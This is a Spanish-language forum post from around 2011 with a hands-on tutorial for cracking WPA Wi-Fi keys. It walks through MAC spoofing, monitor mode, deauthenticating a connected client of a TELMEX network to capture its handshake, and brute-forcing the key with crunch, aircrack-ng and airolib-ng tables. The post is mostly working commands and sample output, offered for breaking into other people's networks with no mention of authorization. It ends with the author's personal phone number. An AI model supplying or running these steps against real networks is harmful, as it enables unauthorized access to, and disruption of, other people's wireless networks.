Que weba, que weba, pero dado a que no estoy haciendo mi servicio social de la universidad pues le dedicare tiempo a hacer mi primer post..
Muchos saben sacar claves wep, osea, quien no? Esas viejas claves en Wired Equivalent Privacy, que ya hasta les sacaron uns distribucion DSL llamada beini para los webones, Hazme el reverendo favor.
Otros tantos pocos han investigado y saben sacar o saben los principios basicos del como hacerse de una clave en WPA, no mather, la idea de este post es la de sacarlos de la caja donde viven y piensen afuera de esta y avancen utilizando mas la imaginacion.
Algunos saben usar airolib? ya saben las tablas tipo Rainbow tables para probar muchisimas mas claves por segundo de lo que te permite aircrack con un simple diccioonario, que si tienen un procesador dual core y 2 GB lo maximo que obtienen son 1200 K/seg. Bueno, sin tanto choro, vamos al grano....
REQUISITOS
librerias aircrack-ng
binarios de crunch password generator
un handshake de una clave WPA
y chingos de paciencia
PASOS
airmon-ng stop wlan0 (detener tu targeta inalambrica, la interfaz puede cambiar "wlan0)
ifconfig wlan0 down (dar de baja la targeta para reconfigurarla)
macchanger --mac 00:11:22:33:44:55 (cambiar el Media Access Controll por uno mas facil y te agilise los sig. pasos)
iwconfig wlan0 mode monitor (cambiar el modo de la targeta a monitor)
airodump-ng wlan0 (monitorear las señales WI-FI a tu alcanze)
_________________________________________________________________________________________
EJEMPLO
CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:76F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX
BSSID STATION PWR Rate Lost Packets Probes
08:76F:60:3C:E8 00:12:34:56:78:90
____________________________________________________________________________________________
aireplay-ng -9 wlan0 *OPCIONAL* (hacer examen de inyeccion para ver si estas al alcanze y poras desautentificar al cliente)
______________________________________________________________________________________
airodump-ng -c 11 -w dump --bssid 08:76F:60:3C:E8 wlan0 (estar a la escucha de la red por si cae un handshake)
## AHORA HAY QUE DESAUTENTIFICAR UN CLIENTE (USUARIO LEGITIMO Y CONECTADO DE LA RED) PARA OBTENER UN HANDSHAKE, O APRETON DE MANOS DONDE ESTA LA CLAVE QUE DESPUES SE SACA POR METODO DE FUERZA BRUTA.
aireplay-ng -0 10 -c 00:12:34:56:78:90 -b 08:76F:60:3C:E8 -e TELMEX wlan0
DESPUES DE ESO LES APARACERA UNA RESPUESTA COMO ESTA EN LA VENTANA DE MONITOREO
CH 11 ][ Elapsed: 4 s ][ 2011-11-07 10:34 [HANDSHAKE:00:12:34:56:78:90] <--------------OJO, CAPTURARON EL 4-WAY HANDSHAKE!
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:76F:60:3C:E8 -78 57 0 0 11 54e WPA PSK TELMEX
BSSID STATION PWR Rate Lost Packets Probes
08:76F:60:3C:E8 00:12:34:56:78:90
_____________________________________________________________________
ya tenemos el handshake con el nombre de dump-01.cap y ahora para romperla tienen dos opciones, usar crunch para que genere contraseñas y hacer pipe directo a aircrack o crear unas tablas con airolib que son un poco mas rapidas, sin embargo necesitaran un buen de espacio libre, minimo unos 100 GB, les recomiendo comprarse un disco duro de 1 TB.
empezamos con crunch + aircrack
si usan backtrack 5 usen estos pasos, si no solo cambien la ruta donde se encuentran sus binarios de crunch
cd /pentest/passwords/crunch
./crunch 10 12 01234567890 | aircrack-ng /root/dump-01.cap -e TELMEX -w -
#ahora crunch empezara a generar contraseñas con los digitos que pusimos en este caso 0123456789 de diez a doce digitos de largo, pueden agregar letras pero las posibilidades aumentan exponencialmente, y es tardado, y toma un par de dias probar todas esas posibilidades. DIJE QUE NECESITARIAN PASCIENCIA
## ahora con la suite airolib, aqui necesitaran minimo 100 GB de espacio en su disco, por que la tabla ocupa un gran espacio. en el anterior no necesitan tener nada de espacio en su disco.
touch essid.txt (crear archivo de texto llamado essid.txt)
echo TELMEX > essid.txt (escribir en el archivo de texto creado el nombre de la red)
cat essid.txt (leer el archivo de texto para confirmar que se escribio)
airolib-ng wpa --import essid essid.txt (crear la tabla con el nombre wpa e importar el nombre de la red del archivo de texto que creamos)
#ahora muevanse al directorio donde tienen crunch para correrlo
./crunch 10 10 0123456789 | airolib-ng /root/wpa --import passwd -
#este ultimo paso es para importar las contraseñas que generara crunch las cuales seran en total 100 GIGAS, esto toma algo de tiempo, pero si toman atencion al numero que corre abajo se daran cuenta que crea una gran cantidad de contraseñas probables y muchisimo mas rapido, tengan pasciencia y esperen.
airolib-ng /root/wpa --stats
airolib-ng /root/wpa --clean all
airolib-ng /root/wpa --batch
airolib-ng /root/wpa -verify all
## ME DIO WEBA EXPLICAR LOS DEMAS PASOS, SOLO HAGANLOS, NO LE HAGAN AL PANCHO, DESPUES DE ESO ESTARA LISTO LA TABLA CON EL NOMBRE DE wpa Y PUEDEN PROCEDER A ROMPER LA CLAVE.
aircrack-ng -r /root/wpa dump-01.cap -e TELMEX
MUCHA SUERTE, SI TE GUSTO DEJA TU COMENTARIO SI NO YA SABES QUE TAMBIEN, DALE A FAVORITOS, ROLALO EN TU MYSPACE, FACEBOOK, TWITTER, GOOGLE+
"hector leal"
jajajaja
si necesitan ayuda con cualquier cosa avisenme, estoy en tamaulipas y san luis potosi
STARK
[email protected]
833 252 4094